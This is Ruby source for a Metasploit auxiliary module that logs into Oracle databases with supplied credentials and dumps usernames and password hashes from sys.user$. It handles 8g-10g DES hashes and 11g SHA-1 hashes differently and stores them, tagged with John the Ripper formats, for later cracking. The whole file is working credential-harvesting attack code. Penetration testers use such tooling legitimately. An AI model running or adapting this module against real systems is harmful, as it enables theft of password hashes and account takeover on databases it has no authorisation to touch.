## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'Oracle Password Hashdump', 'Description' => %Q{ This module dumps the usernames and password hashes from Oracle given the proper Credentials and SID. These are then stored as creds for later cracking. }, 'Author' => ['theLightCosine'], 'License' => MSF_LICENSE ) end def run_host(ip) return if not check_dependencies #Checks for Version of Oracle, 8g-10g all behave one way, while 11g behaves differently #Also, 11g uses SHA-1 while 8g-10g use DES is_11g=false query = 'select * from v$version' ver = prepare_exec(query) if ver.nil? print_error("An Error has occured, check your OPTIONS") return end unless ver.empty? if ver[0].include?('11g') is_11g=true print_status("Server is running 11g, using newer methods...") end end this_service = report_service( :host => datastore['RHOST'], :port => datastore['RPORT'], :name => 'oracle', :proto => 'tcp' ) tbl = Rex::Ui::Text::Table.new( 'Header' => 'Oracle Server Hashes', 'Indent' => 1, 'Columns' => ['Username', 'Hash'] ) #Get the usernames and hashes for 8g-10g begin if is_11g==false query='SELECT name, password FROM sys.user$ where password is not null and name<> \'ANONYMOUS\'' results= prepare_exec(query) unless results.empty? results.each do |result| row= result.split(/,/) tbl << row end end #Get the usernames and hashes for 11g else query='SELECT name, spare4 FROM sys.user$ where password is not null and name<> \'ANONYMOUS\'' results= prepare_exec(query) #print_status("Results: #{results.inspect}") unless results.empty? results.each do |result| row= result.split(/,/) row[2] = 'No' tbl << row end end end rescue => e print_error("An error occured. The supplied credentials may not have proper privs") return end print_status("Hash table :\n #{tbl}") report_hashes(tbl, is_11g, ip, this_service) end def report_hashes(table, is_11g, ip, service) #reports the hashes slightly differently depending on the version #This is so that we know which are which when we go to crack them if is_11g==false jtr_format = "des" else jtr_format = "raw-sha1" end service_data = { address: Rex::Socket.getaddress(ip), port: service[:port], protocol: service[:proto], service_name: service[:name], workspace_id: myworkspace_id } table.rows.each do |row| credential_data = { origin_type: :service, module_fullname: self.fullname, username: row[0], private_data: row[1], private_type: :nonreplayable_hash, jtr_format: jtr_format } credential_core = create_credential(credential_data.merge(service_data)) login_data = { core: credential_core, status: Metasploit::Model::Login::Status::UNTRIED } create_credential_login(login_data.merge(service_data)) end print_status("Hash Table has been saved") end end